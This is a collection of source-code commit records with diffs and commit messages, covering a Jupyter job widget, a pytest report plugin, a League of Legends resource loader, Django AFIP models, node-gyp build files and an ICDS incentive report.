labels4 = widgets.HTML(value='<h5>Message</h5>') labels = widgets.HBox(children=[labels0, labels1, labels2, labels3, labels4], layout=widgets.Layout(width='600px', margin='0px 0px 0px 35px')) return labels def create_job_widget(watcher, job, backend, status='', queue_pos=None, msg=''): """Creates a widget corresponding to a particular job instance. Args: watcher (widget): The job watcher instance. job (IBMQJob): The job. backend (str): The backend the job is running on. status (str): The job status. queue_pos (int): Queue position, if any. msg (str): Job message, if any. Returns: widget: The job widget """ job_id = job.job_id() id_label = widgets.HTML(value="{}".format(job_id), layout=widgets.Layout(width='190px')) backend_label = widgets.HTML(value="{}".format(backend), layout=widgets.Layout(width='145px')) status_label = widgets.HTML(value="{}".format(status), layout=widgets.Layout(width='95px')) if queue_pos is None: queue_pos = '-' else: queue_pos = str(queue_pos) queue_label = widgets.HTML(value="{}".format(queue_pos), layout=widgets.Layout(width='70px')) msg_label = widgets.HTML(value="<p style=white-space:nowrap;>{}</p>".format(msg), layout=widgets.Layout(overflow_x='scroll')) close_button = widgets.Button(button_style='', icon='close', layout=widgets.Layout(width='30px', margin="0px 5px 0px 0px")) close_button.style.button_color = 'white' def cancel_on_click(_): watcher.cancel_job(job_id) close_button.on_click(cancel_on_click) job_grid = widgets.HBox(children=[close_button, id_label, backend_label, status_label, queue_label, msg_label], layout=widgets.Layout(min_width='700px', max_width='700px')) job_grid.job_id = job_id job_grid.job = job return job_grid def build_job_viewer(): """Builds the job viewer widget Returns: widget: Job viewer. 
""" acc = widgets.Accordion(children=[widgets.VBox(layout=widgets.Layout(max_width='710px', min_width='710px'))], layout=widgets.Layout(width='auto', max_width='750px', max_height='500px', overflow_y='scroll', overflow_x='hidden')) acc.set_title(0, 'IBMQ Jobs') acc.selected_index = None acc.layout.visibility = 'hidden' display(acc) acc._dom_classes = ['job_widget'] display(Javascript("""$('div.job_widget') .detach() .appendTo($('#header')) .css({ 'z-index': 999, 'position': 'fixed', 'box-shadow': '5px 5px 5px -3px black', 'opacity': 0.95, 'float': 'left,' }) """)) acc.layout.visibility = 'visible' return acc
Python
0
@@ -2449,17 +2449,17 @@ px 0px 3 -5 +7 px'))%0A @@ -3880,17 +3880,17 @@ width='3 -0 +2 px',%0A
5763cb2f95b731933263f0dd38fbffff6f71147c
Add default_diff and timeout to plugin
tests/examples/examples_report_plugin.py
tests/examples/examples_report_plugin.py
from __future__ import absolute_import import pytest import jinja2 import os import re import sys from os.path import join, dirname from py.xml import html from ..constants import __version__ from ..utils import write, green from .utils import no_ext, human_bytes PY3 = sys.version_info[0] == 3 def pytest_addoption(parser): parser.addoption( "--examplereport", action='store', dest='examplereport', metavar='path', default=None, help='create examples html report file at given path.' ) parser.addoption( "--patterns", type=str, nargs="*", help="select a subset of examples to test" ) parser.addoption( "--bokeh-port", type=int, default=5006, help="port on which Bokeh server resides" ) parser.addoption( "--notebook-port", type=int, default=6007, help="port on which Jupyter Notebook server resides" ) parser.addoption( "--phantomjs", type=str, default="phantomjs", help="phantomjs executable" ) parser.addoption( "--timeout", type=int, default=default_timeout, help="how long can an example run (in seconds)" ) parser.addoption( "--all-notebooks", action="store_true", default=False, help="test all the notebooks inside examples/plotting/notebook folder." ) parser.addoption( "--output-cells", type=str, choices=['complain', 'remove', 'ignore'], default='complain', help="what to do with notebooks' output cells" ) parser.addoption( "--log-file", default='examples.log', help="where to write the complete log" ) parser.addoption( "--diff", type=str, default=default_diff, help="compare generated images against this ref" ) def pytest_configure(config): examplereport = config.option.examplereport # prevent opening htmlpath on slave nodes (xdist) if examplereport and not hasattr(config, 'slaveinput'): config.examplereport = ExamplesTestReport(examplereport) config.pluginmanager.register(config.examplereport) def pytest_unconfigure(config): examplereport = getattr(config, 'examplereport', None) if examplereport: del config.examplereport config.pluginmanager.unregister(html) class ExamplesTestReport(object): def __init__(self, examplereport): examplereport = os.path.expanduser(os.path.expandvars(examplereport)) self.examplereport = os.path.abspath(examplereport) self.entries = [] self.errors = self.failed = 0 self.passed = self.skipped = 0 self.xfailed = self.xpassed = 0 def _appendrow(self, result, report): skipped = False failed = False if result == 'Failed': failed = True if result == 'Skipped': skipped = True # Example is the path of the example that was run # It can be got from the report.location attribute which is a tuple # that looks # something like this: # ('tests/examples/test_examples.py', 49, 'test_file_examples[/Users/caged/Dev/bokeh/bokeh/examples/models/anscombe.py]') example = re.search(r'\[(.*?)\]', report.location[2]).group(1) example_path = no_ext(example) diff = pytest.config.option.diff png_file = "%s-%s.png" % (example_path, __version__) png_diff = "%s-%s-diff.png" % (example_path, __version__) ref_png = "%s-%s.png" % (example_path, diff) self.entries.append((example_path, diff, failed, skipped, png_file, png_diff, ref_png)) write(green("---") + " " + example) def append_pass(self, report): self.passed += 1 self._appendrow('Passed', report) def append_failure(self, report): if hasattr(report, "wasxfail"): self._appendrow('XPassed', report) self.xpassed += 1 else: self._appendrow('Failed', report) self.failed += 1 def append_error(self, report): self._appendrow('Error', report) self.errors += 1 def append_skipped(self, report): if hasattr(report, "wasxfail"): self._appendrow('XFailed', report) 
self.xfailed += 1 else: self._appendrow('Skipped', report) self.skipped += 1 def pytest_runtest_logreport(self, report): if report.passed: if report.when == 'call': self.append_pass(report) elif report.failed: if report.when != "call": self.append_error(report) else: self.append_failure(report) elif report.skipped: self.append_skipped(report) def pytest_sessionfinish(self, session): with open(join(dirname(__file__), "examples_report.jinja")) as f: template = jinja2.Template(f.read()) html = template.render(version=__version__, entries=self.entries) if not os.path.exists(os.path.dirname(self.examplereport)): os.makedirs(os.path.dirname(self.examplereport)) with open(self.examplereport, 'w', encoding='utf-8') as f: f.write(html) if pytest.config.option.upload: report_size = len(html) write("%s Uploading report (%s) ..." % (green(">>>"), human_bytes(report_size))) # Does not currently upload report def pytest_terminal_summary(self, terminalreporter): terminalreporter.write_sep('-', 'generated example report: {0}'.format( self.examplereport))
Python
0
@@ -187,16 +187,47 @@ ersion__ +, default_diff, default_timeout %0Afrom ..
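Small fix, classic failure mode: default_diff and default_timeout are referenced as addoption defaults but were never imported, so the first call to pytest_addoption dies with a NameError; the patch just widens the constants import. A minimal standalone reproduction of why the name must exist when the option is declared (300 here is a hypothetical stand-in, not the real value from ..constants):

import argparse

default_timeout = 300  # hypothetical; the project's value lives in ..constants
parser = argparse.ArgumentParser()
parser.add_argument("--timeout", type=int, default=default_timeout,
                    help="how long can an example run (in seconds)")
print(parser.parse_args([]).timeout)  # 300 -- NameError here if the import is missing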
6fbb50fcb851d0387d44dbaca361cc63f1dbbe79
Add get_db_query method.
loldb/v2/resources.py
loldb/v2/resources.py
import collections import os import re import sqlite3 import raf def _get_highest_version(versions): versions = [(v, v.split('.')) for v in versions] def version_converter(version): try: parts = map(int, version[1]) except ValueError: return None else: return [parts, version[0]] versions = map(version_converter, versions) versions = filter(lambda x: x is not None, versions) versions = sorted(versions) if not versions: raise RuntimeError("No valid version.") return versions[-1][1] def _make_re_pattern(token_str, flags=None): """Converts spacing in token_str to variable-length, compiles.""" return re.compile(r'\s*'.join(token_str.split()), flags) def _build_path( base_path, project="lol_air_client", subdir='releases', version=None): """Generate path for most recent release of a project.""" subdir = subdir.lower() path = [base_path, "RADS/projects", project, subdir] if subdir != 'filearchives': if version is None: current_base = os.path.join(*path) versions = os.listdir(current_base) versions = [v for v in versions if os.path.isdir(os.path.join(current_base, v))] version = _get_highest_version(versions) path.append(version) return os.path.join(*path) class ResourceProvider(object): def __init__(self, lol_path, language='en_US'): self.base_path = lol_path self.language = language self.db = None self.raf = None self.font_config = None def _get_db_path(self): return os.path.join( _build_path(self.base_path), # TODO: Is /bin used on Windows? 'deploy/bin/assets/data/gameStats', 'gameStats_%s.sqlite' % self.language, ) def _get_raf_path(self): return _build_path( self.base_path, 'lol_game_client', 'filearchives' ) def get_db(self): """Get connection to gameStats database.""" if self.db is None: self.db = sqlite3.connect(self._get_db_path()) return self.db def get_db_rows(self, table): """Get the rows from a gameStats database table.""" connection = self.get_db() cursor = connection.cursor() # execute doesn't accept a parametrized table name rows = cursor.execute("SELECT * FROM `%s`" % table) # Get column names from cursor columns = [c[0] for c in cursor.description] row_class = collections.namedtuple('Row', columns) for row in rows: row = row_class(*row) yield row def get_raf_master(self): """Get RAFMaster instance for game client.""" if self.raf is None: self.raf = raf.RAFMaster(self._get_raf_path()) return self.raf def get_font_config(self): """Get font_config dictionary.""" if self.font_config is None: archive = self.get_raf_master() font_config = {} font_config_text = archive.find(name='fontconfig_en_US.txt').read() font_config_re = _make_re_pattern('^ tr "([^"]+)" = "(.+)" $', re.M) for match in font_config_re.finditer(font_config_text): font_config[match.group(1)] = match.group(2) self.font_config = font_config return self.font_config class MacResourceProvider(ResourceProvider): def __init__(self, lol_path=None, **kwargs): if lol_path is None: lol_path = "/Applications/League of Legends.app/Contents/LOL" super(MacResourceProvider, self).__init__(lol_path, **kwargs) class WindowsResourceProvider(ResourceProvider): pass
Python
0
@@ -2262,24 +2262,25 @@ _db_ -rows +query (self, -table +query ):%0A @@ -2328,21 +2328,21 @@ atabase -table +query .%22%22%22%0A @@ -2503,36 +2503,13 @@ ute( -%22SELECT * FROM %60%25s%60%22 %25 table +query )%0A%0A @@ -2718,16 +2718,16 @@ s(*row)%0A - @@ -2741,16 +2741,174 @@ ld row%0A%0A + def get_db_rows(self, table):%0A %22%22%22Get the rows from a gameStats database table.%22%22%22%0A return self.get_db_query(%22SELECT * FROM %60%25s%60%22 %25 table)%0A%0A def
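The refactor splits the fetcher in two: a generic get_db_query that yields namedtuple rows for arbitrary SQL, and get_db_rows reduced to a one-line wrapper. The same shape as a standalone sketch (plain functions over an sqlite3 connection instead of the provider's methods; the champion row is made-up sample data):

import collections
import sqlite3

def get_db_query(connection, query):
    """Yield the rows of an arbitrary query as namedtuples."""
    cursor = connection.cursor()
    rows = cursor.execute(query)
    columns = [c[0] for c in cursor.description]  # column names from the cursor
    row_class = collections.namedtuple('Row', columns)
    for row in rows:
        yield row_class(*row)

def get_db_rows(connection, table):
    """Yield the rows of a whole table."""
    # execute() can't parametrize a table name, hence the interpolation
    return get_db_query(connection, "SELECT * FROM `%s`" % table)

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE champions (name, title)")
conn.execute("INSERT INTO champions VALUES ('Ahri', 'the Nine-Tailed Fox')")
print(list(get_db_rows(conn, "champions")))  # [Row(name='Ahri', title='the Nine-Tailed Fox')]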
3968a526dea052008b608004b9bde8ee7d55309c
Fix type in FileFields
django_afip/models.py
django_afip/models.py
from django.db import models class GenericAfipType(models.Model): code = models.CharField(max_length=3) description = models.CharField(max_length=250) valid_from = models.DateField() valid_to = models.DateField() class Meta: abstract = True class ReceiptType(GenericAfipType): pass class ConceptType(GenericAfipType): pass class DocumentType(GenericAfipType): pass class VatType(GenericAfipType): pass class TaxType(GenericAfipType): pass class CurrencyType(GenericAfipType): pass class TaxPayer(models.Model): name = models.CharField(max_length=32) key = models.FieldField( null=True, ) certificate = models.FieldField( null=True, ) cuit = models.PositiveSmallIntegerField() class SalesPoint(models.Model): number = models.PositiveSmallIntegerField() issuance_type = models.CharField(max_length=8) # FIXME blocked = models.BooleanField() drop_date = models.DateField() owner = models.ForeignKey(TaxPayer) class ReceiptBatch(models.Model): """ Receipts are validated sent in batches. """ amount = models.PositiveSmallIntegerField() receipt_type = models.ForeignKey(ReceiptType) sales_point = models.ForeignKey(SalesPoint) owner = models.ForeignKey(TaxPayer) class Receipt(models.Model): """ An AFIP-related document (eg: invoice). """ pack = models.ForeignKey( ReceiptBatch, related_name='details', null=True, ) concept = models.ForeignKey( ConceptType, related_name='documents', ) document_type = models.ForeignKey( DocumentType, related_name='documents', ) document_number = models.BigIntegerField() from_invoice = models.PositiveIntegerField( null=True, ) to_invoice = models.PositiveIntegerField( null=True, ) date = models.DateField() net_untaxed = models.DecimalField( max_digits=15, decimal_places=2, ) net_taxed = models.DecimalField( max_digits=15, decimal_places=2, ) exempt_amount = models.DecimalField( max_digits=15, decimal_places=2, ) tax_amount = models.DecimalField( max_digits=15, decimal_places=2, ) service_from_date = models.DateField() service_to_date = models.DateField() expiration_date = models.DateField() currency = models.ForeignKey( CurrencyType, related_name='documents', ) currency_quote = models.DecimalField( max_digits=10, decimal_places=6, ) related_receipts = models.ManyToManyField( 'Receipt', ) # optionals @property def total(self): pass class Tax(models.Model): tax_type = models.ForeignKey(TaxType) description = models.CharField(max_length=80) base_amount = models.DecimalField( max_digits=15, decimal_places=2, ) aliquot = models.DecimalField( max_digits=5, decimal_places=2, ) amount = models.DecimalField( max_digits=15, decimal_places=2, ) receipt = models.ForeignKey(Receipt) class Vat(models.Model): vat_type = models.ForeignKey(VatType) base = models.DecimalField( max_digits=15, decimal_places=2, ) amount = models.DecimalField( max_digits=15, decimal_places=2, ) receipt = models.ForeignKey(Receipt) class Validation(models.Model): RESULT_APPROVED = 'A' RESULT_REJECTED = 'R' RESULT_PARTIAL = 'P' processed_date = models.DateField() result = models.CharField( max_length=1, choices=( (RESULT_APPROVED, 'Aprovado'), (RESULT_REJECTED, 'Rechazado'), (RESULT_PARTIAL, 'Parcial'), ), ) batch = models.ForeignKey( ReceiptBatch, related_name='validations' ) class Observation(models.Model): code = models.PositiveSmallIntegerField() message = models.CharField(max_length=255) class ReceiptValidation(models.Model): validation = models.ForeignKey(Validation) result = models.CharField( max_length=1, choices=( (Validation.RESULT_APPROVED, 'Aprovado'), (Validation.RESULT_REJECTED, 'Rechazado'), 
(Validation.RESULT_PARTIAL, 'Parcial'), ), ) cae = models.CharField(max_length=14) cae_expiration = models.DateTimeField() observations = models.ForeignKey(Observation) receipt = models.ForeignKey( Receipt, related_name='validations', )
Python
0.000001
@@ -627,35 +627,34 @@ key = models.Fi +l e -ld Field(%0A n @@ -696,19 +696,18 @@ odels.Fi +l e -ld Field(%0A
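Django ships FileField, not FieldField, so the original module could not even be imported: the typo raises AttributeError as soon as the class body executes. The corrected declarations (sketch; running it requires a configured Django project):

from django.db import models

class TaxPayer(models.Model):
    name = models.CharField(max_length=32)
    key = models.FileField(null=True)          # was models.FieldField
    certificate = models.FileField(null=True)  # was models.FieldField
    cuit = models.PositiveSmallIntegerField()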
b2ec61003a7df4ebc46d40a3d72e262440c5008d
version 1.1.0
django_th/__init__.py
django_th/__init__.py
VERSION = (1, 0, 0) # PEP 386 __version__ = ".".join([str(x) for x in VERSION]) default_app_config = 'django_th.apps.DjangoThConfig'
Python
0.000002
@@ -7,17 +7,17 @@ N = (1, -0 +1 , 0) #
45ab8a3585008cc4ad31eb553b9291f4e1a65c01
Update C++ version, #190
binding.gyp
binding.gyp
{ "variables": { "os_linux_compiler%": "gcc", "use_vl32%": "false", "use_fixed_size%": "false", "use_posix_semaphores%": "false" }, "targets": [ { "target_name": "node-lmdb", "win_delay_load_hook": "false", "sources": [ "dependencies/lmdb/libraries/liblmdb/mdb.c", "dependencies/lmdb/libraries/liblmdb/midl.c", "src/node-lmdb.cpp", "src/env.cpp", "src/misc.cpp", "src/txn.cpp", "src/dbi.cpp", "src/cursor.cpp" ], "include_dirs": [ "<!(node -e \"require('nan')\")", "dependencies/lmdb/libraries/liblmdb" ], "conditions": [ ["OS=='linux'", { "variables": { "gcc_version" : "<!(<(os_linux_compiler) -dumpversion | cut -d '.' -f 1)", }, "conditions": [ ["gcc_version>=7", { "cflags": [ "-Wimplicit-fallthrough=2", ], }], ], "ldflags": [ "-fPIC", "-fvisibility=hidden" ], "cflags": [ "-fPIC", "-fvisibility=hidden" ], "cflags_cc": [ "-fPIC", "-fvisibility=hidden", "-fvisibility-inlines-hidden", "-std=c++0x" ] }], ["OS=='mac'", { "conditions": [ ["use_posix_semaphores=='true'", { "defines": ["MDB_USE_POSIX_SEM"] }] ], "xcode_settings": { "OTHER_CPLUSPLUSFLAGS" : ["-std=c++11"], "MACOSX_DEPLOYMENT_TARGET": "10.7", "OTHER_LDFLAGS": ["-std=c++11"], "CLANG_CXX_LIBRARY": "libc++" } }], ["OS=='win'", { "libraries": ["ntdll.lib"] }], ["use_fixed_size=='true'", { "defines": ["MDB_FIXEDSIZE"], }], ["use_vl32=='true'", { "conditions": [ ["target_arch=='ia32'", { "defines": ["MDB_VL32"] }] ] }], ], } ] }
Python
0
@@ -1327,10 +1327,10 @@ =c++ -0x +14 %22%0A @@ -1593,33 +1593,33 @@ S%22 : %5B%22-std=c++1 -1 +4 %22%5D,%0A @@ -1694,17 +1694,17 @@ std=c++1 -1 +4 %22%5D,%0A
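.gyp files are Python-literal JSON, so the change is pure flag substitution: the pre-standardization spelling -std=c++0x on Linux and the mac targets' -std=c++11 all become -std=c++14. The two patched fragments, decoded:

"cflags_cc": [
    "-fPIC", "-fvisibility=hidden",
    "-fvisibility-inlines-hidden", "-std=c++14"
]

# and in the mac branch:
"xcode_settings": {
    "OTHER_CPLUSPLUSFLAGS": ["-std=c++14"],
    "MACOSX_DEPLOYMENT_TARGET": "10.7",
    "OTHER_LDFLAGS": ["-std=c++14"],
    "CLANG_CXX_LIBRARY": "libc++"
}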
9c950c73bdc518c35aa471834431222c7c60ea4b
update binding.gyp
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "ons", "sources": [ "src/entry.cpp", "src/ons_options.cpp", "src/consumer_ack.cpp", "src/consumer.cpp", "src/producer.cpp", "src/consumer_listener.cpp" ], "include_dirs": [ "src/third_party/include", "<!(node -e \"require('nan')\")" ], "conditions": [ ["OS==\"mac\"", { "cflags!": [ "-fno-exceptions" ], "cflags_cc!": [ "-fno-exceptions", "-pthread", "-Wl,--no-as-needed", "-ldl" ], "cflags_cc": [ "-Wno-ignored-qualifiers" ], "cflags": [ "-std=c++11", "-stdlib=libc++" ], "include_dirs": [ "/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/include/c++/v1" ], "xcode_settings": { "GCC_ENABLE_CPP_EXCEPTIONS": "YES" } }], ["OS==\"linux\"", { "libraries": [ "../src/third_party/lib/linux/libonsclient4cpp.a" ], "cflags_cc!": [ "-fno-exceptions", "-pthread", "-Wl,--no-as-needed", "-ldl" ], "cflags_cc": [ "-Wno-ignored-qualifiers" ], "cflags": [ "-std=c++11" ] }], ["OS==\"win\"", { "conditions": [ ["target_arch==\"ia32\"", { "libraries": [ "../src/third_party/lib/windows/32x/ONSClient4CPP.lib" ], "copies": [ { "destination": "<(module_root_dir)/build/Release/", "files": [ "<(module_root_dir)/src/third_party/lib/windows/32x/ONSClient4CPP.dll" ] } ] }], ["target_arch==\"x64\"", { "libraries": [ "../src/third_party/lib/windows/64x/ONSClient4CPP.lib" ], "copies": [ { "destination": "<(module_root_dir)/build/Release/", "files": [ "<(module_root_dir)/src/third_party/lib/windows/64x/ONSClient4CPP.dll" ] } ] }] ] }] ] } ] }
Python
0
@@ -308,16 +308,65 @@ ner.cpp%22 +,%0A %22src/third_party/sole/sole.cpp%22 %0A @@ -447,16 +447,56 @@ clude%22,%0A + %22src/third_party/sole%22,%0A
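The addon vendors the sole library (a single-file C++ UUID generator): its translation unit is appended to sources and its directory to include_dirs so the headers resolve. Patched lists, decoded:

"sources": [
    "src/entry.cpp",
    "src/ons_options.cpp",
    "src/consumer_ack.cpp",
    "src/consumer.cpp",
    "src/producer.cpp",
    "src/consumer_listener.cpp",
    "src/third_party/sole/sole.cpp"
],
"include_dirs": [
    "src/third_party/include",
    "src/third_party/sole",
    "<!(node -e \"require('nan')\")"
]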
f0f3a7ab0b285f447f0573ff537e6252a8752528
Use pkg-build in binding.gyp
binding.gyp
binding.gyp
{ "targets": [ { "target_name": "tiff-multipage", "sources": [ "src/module.cc", "src/sync.cc", "src/async.cc", "src/tiff_multipage.cc" ], "include_dirs": ["<!(node -e \"require('nan')\")"], "libraries": [ "-ltiff" ] } ] }
Python
0
@@ -272,16 +272,33 @@ dirs%22: %5B +%0A %22%3C!(node @@ -321,16 +321,104 @@ an')%5C%22)%22 +,%0A %22%3C!@(pkg-config libtiff-4 --cflags-only-I %7C sed s/-I//g)%22%0A %5D,%0A @@ -463,16 +463,68 @@ %22-ltiff%22 +,%0A %22%3C!@(pkg-config --libs libtiff-4)%22 %0A
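Rather than assuming libtiff's headers sit on the default search path, the patched file asks pkg-config at gyp time: <! runs a shell command during generation, the @ splits its stdout into list items, and sed strips the -I prefixes because include_dirs wants bare paths. Decoded result:

"include_dirs": [
    "<!(node -e \"require('nan')\")",
    "<!@(pkg-config libtiff-4 --cflags-only-I | sed s/-I//g)"
],
"libraries": [
    "-ltiff",
    "<!@(pkg-config --libs libtiff-4)"
]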
c34f040ba19c27277d6cc9a1ad46e4c8d668e77b
Apply -DNDEBUG globally on release builds
binding.gyp
binding.gyp
{ "target_defaults": { "target_conditions": [ ["OS != 'win'", { "cflags": ["-fdata-sections", "-ffunction-sections", "-fvisibility=hidden"], "ldflags": ["-Wl,--gc-sections"] }], ["OS == 'mac'", { "xcode_settings": { "MACOSX_DEPLOYMENT_TARGET": "10.9", } }] ] }, "targets": [ { "target_name": "libargon2", "sources": [ "argon2/src/argon2.c", "argon2/src/core.c", "argon2/src/blake2/blake2b.c", "argon2/src/thread.c", "argon2/src/encoding.c", ], "include_dirs": ["argon2/include"], "cflags": ["-march=native", "-Wno-type-limits"], "conditions": [ ["target_arch == 'ia32' or target_arch == 'x64'", { "cflags+": ["-msse", "-msse2"], "sources+": ["argon2/src/opt.c"] }, { "sources+": ["argon2/src/ref.c"] }] ], "type": "static_library" }, { "target_name": "argon2", "sources": [ "src/argon2_node.cpp" ], "include_dirs": [ "<!(node -e \"require('nan')\")", "argon2/include" ], "dependencies": ["libargon2"], "configurations": { "Debug": { "conditions": [ ["OS == 'linux'", { "cflags": ["--coverage", "-Wall", "-Wextra"], "ldflags": ["-fprofile-arcs", "-ftest-coverage"], }] ] }, "Release": { "defines+": ["NDEBUG"] } } } ] }
Python
0
@@ -318,24 +318,144 @@ %7D%0A %7D%5D%0A + %5D,%0A %22target_configurations%22: %5B%0A %5B%7B%0A %22Release%22: %7B%0A %22defines+%22: %5B%22NDEBUG%22%5D%0A %7D%0A %7D%5D%0A %5D%0A %7D,%0A @@ -1563,73 +1563,8 @@ %5D%0A - %7D,%0A %22Release%22: %7B%0A %22defines+%22: %5B%22NDEBUG%22%5D%0A
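The intent is to hoist the Release-only NDEBUG define out of the argon2 target's configurations and into target_defaults so libargon2 gets it too. Reproduced verbatim from the diff — note it spells the key "target_configurations" and wraps the dict in an extra list, mirroring the neighbouring target_conditions shape, whereas gyp's documented spelling for shared per-configuration settings is a plain "configurations" dict; treat this as the commit's literal content rather than a pattern to copy:

"target_defaults": {
    "target_conditions": [
        # OS != 'win' and OS == 'mac' entries unchanged
    ],
    "target_configurations": [
        [{
            "Release": {
                "defines+": ["NDEBUG"]
            }
        }]
    ]
}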
b0dea361dfb27e537c0165dac69e71c20f33e883
Add helpers to bindings.gyp
binding.gyp
binding.gyp
{ 'targets': [ { 'target_name': 'jsaudio', 'sources': ['src/jsaudio.cc'], 'include_dirs': [ '<!(node -e "require(\'nan\')")', '<(module_root_dir)/vendor/' ], "conditions": [ [ 'OS=="win"', { "conditions": [ [ 'target_arch=="ia32"', { "libraries": [ '<(module_root_dir)/vendor/portaudio_x86.lib' ], 'copies': [ { 'destination': '<(module_root_dir)/build/Release/', 'files': [ '<(module_root_dir)/vendor/portaudio_x86.dll', '<(module_root_dir)/vendor/portaudio_x86.lib', ] }] } ], [ 'target_arch=="x64"', { "libraries": [ '<(module_root_dir)/vendor/portaudio_x64.lib' ], 'copies': [ { 'destination': '<(module_root_dir)/build/Release/', 'files': [ '<(module_root_dir)/vendor/portaudio_x64.dll', '<(module_root_dir)/vendor/portaudio_x64.lib', ] }] } ] ], "include_dirs": ["gyp/include"] } ] ] }] }
Python
0.000001
@@ -76,16 +76,34 @@ udio.cc' +, 'src/helpers.cc' %5D,%0A '
7e5cafed3908f829bb8ff334a7d8f6ebb939a7cc
fix test import for python3
d4s2_api/dukeds_auth.py
d4s2_api/dukeds_auth.py
from gcb_web_auth.dukeds_auth import DukeDSTokenAuthentication from gcb_web_auth.backends.dukeds import DukeDSAuthBackend from gcb_web_auth.backends.base import BaseBackend from models import DukeDSUser class D4S2DukeDSTokenAuthentication(DukeDSTokenAuthentication): """ Extends authorization to save users to DukeDSUser """ def __init__(self): self.backend = DukeDSAuthBackend() class D4S2DukeDSAuthBackend(DukeDSAuthBackend): """ Backend for DukeDS Auth that save users to DukeDSUser Conveniently, the keys used by DukeDS user objects are a superset of the django ones, so we rely on the filtering in the base class """ def __init__(self, save_tokens=True, save_dukeds_users=True): super(D4S2DukeDSAuthBackend, self).__init__(save_tokens, save_dukeds_users) self.save_tokens = save_tokens self.save_dukeds_users = save_dukeds_users self.failure_reason = None def save_dukeds_user(self, user, raw_user_dict): user_dict = DukeDSAuthBackend.harmonize_dukeds_user_details(raw_user_dict) dukeds_user, created = DukeDSUser.objects.get_or_create(user=user, dds_id=raw_user_dict.get('id')) if created: BaseBackend.update_model(dukeds_user, user_dict)
Python
0.000001
@@ -171,16 +171,17 @@ nd%0Afrom +. models i
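The one-character fix is the implicit-relative-import removal from PEP 328: on Python 3, a bare `from models import ...` inside the d4s2_api package is resolved against sys.path and raises ImportError, while the dotted form resolves against the package on both interpreters. As a fragment (only meaningful inside a package; layout shown for orientation):

# d4s2_api/
#     __init__.py
#     models.py        <- defines DukeDSUser
#     dukeds_auth.py   <- this file

from .models import DukeDSUser   # explicit relative: works on py2 and py3
# from models import DukeDSUser  # implicit relative: py2 only, ImportError on py3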
5f8f93a366c7f1007a67849346eb094630ab15fb
Change different rounding date to March instead of April
custom/icds_reports/reports/incentive.py
custom/icds_reports/reports/incentive.py
from __future__ import unicode_literals, absolute_import, division from custom.icds_reports.models.views import AWWIncentiveReportMonthly from custom.icds_reports.utils import india_now, DATA_NOT_ENTERED class IncentiveReport(object): def __init__(self, location, month, aggregation_level): self.location = location self.month = month self.aggregation_level = aggregation_level def get_excel_data(self): def _format_infrastructure_data(data): return data if data else DATA_NOT_ENTERED if self.aggregation_level == 1: data = AWWIncentiveReportMonthly.objects.filter( month=self.month, state_id=self.location ).order_by('-district_name', '-block_name', '-supervisor_name') elif self.aggregation_level == 2: data = AWWIncentiveReportMonthly.objects.filter( month=self.month, district_id=self.location ).order_by('-block_name', '-supervisor_name') else: data = AWWIncentiveReportMonthly.objects.filter( month=self.month, block_id=self.location ).order_by('-supervisor_name') data = data.values( 'state_name', 'district_name', 'block_name', 'supervisor_name', 'awc_name', 'aww_name', 'contact_phone_number', 'wer_weighed', 'wer_eligible', 'awc_num_open', 'valid_visits', 'expected_visits', 'is_launched' ) headers = [ 'State', 'District', 'Block', 'Supervisor', 'AWC', 'AWW Name', 'AWW Contact Number', 'Home Visits Conducted', 'Number of Days AWC was Open', 'Weighing Efficiency', 'Eligible for Incentive' ] excel_rows = [headers] for row in data: row_data = [ row['state_name'], row['district_name'], row['block_name'], row['supervisor_name'], row['awc_name'], ] # AWC not launched if row['is_launched'] != 'yes': AWC_NOT_LAUNCHED = 'AWC not launched' row_data.extend([ AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED, AWC_NOT_LAUNCHED ]) else: if self.month.year < 2019 or (self.month.year == 2019 and self.month.month < 4): func = int else: func = round home_visit_percent = row['valid_visits'] / func(row['expected_visits']) if \ func(row['expected_visits']) else 1 weighing_efficiency_percent = row['wer_weighed'] / row['wer_eligible'] if \ row['wer_eligible'] else 1 if home_visit_percent > 1: home_visit_percent = 1 home_visit_conducted = '{:.2%}'.format(home_visit_percent) if row['awc_num_open'] is None: num_open = DATA_NOT_ENTERED else: num_open = row['awc_num_open'] weighing_efficiency = '{:.2%}'.format(weighing_efficiency_percent) eligible_for_incentive = 'Yes' if \ weighing_efficiency_percent >= 0.6 and home_visit_percent >= 0.6 else 'No' no_visits = row['valid_visits'] == 0 and row['expected_visits'] == 0 no_weights = row['wer_eligible'] == 0 if no_visits: home_visit_conducted = "No expected home visits" if no_weights: weighing_efficiency = "No expected weight measurement" if no_visits and no_weights: eligible_for_incentive = "Yes" row_data.extend([ _format_infrastructure_data(row['aww_name']), _format_infrastructure_data(row['contact_phone_number']), home_visit_conducted, num_open, weighing_efficiency, eligible_for_incentive ]) excel_rows.append(row_data) return [ [ 'AWW Performance Report', excel_rows ], [ 'Export Info', [ ['Generated at', india_now()], ['Grouped By', 'AWC'], ['Month', self.month.month], ['Year', self.month.year], ['Disclaimer', "The information in the report is based on the self-reported data entered by " "the Anganwadi Worker in ICDS-CAS mobile application and is subject to timely " "data syncs."] ] ] ]
Python
0.000024
@@ -2495,9 +2495,9 @@ h %3C -4 +3 ):%0A
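The whole change is one month of behaviour: the cutoff between int() truncation and round() for expected home visits moves from April 2019 back to March 2019. Pulled out as a testable predicate:

import datetime

def visit_rounder(month):
    """int() (truncate) before March 2019, round() from March 2019 on."""
    if month.year < 2019 or (month.year == 2019 and month.month < 3):
        return int
    return round

assert visit_rounder(datetime.date(2019, 2, 1)) is int    # February: old rounding
assert visit_rounder(datetime.date(2019, 3, 1)) is round  # March: new rounding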
a9104e7529eb75454aaaa2ea29b8ebe40ee7bbd0
Add documentation to sloppy_interleave function
tensorflow/contrib/data/python/ops/sloppy_ops.py
tensorflow/contrib/data/python/ops/sloppy_ops.py
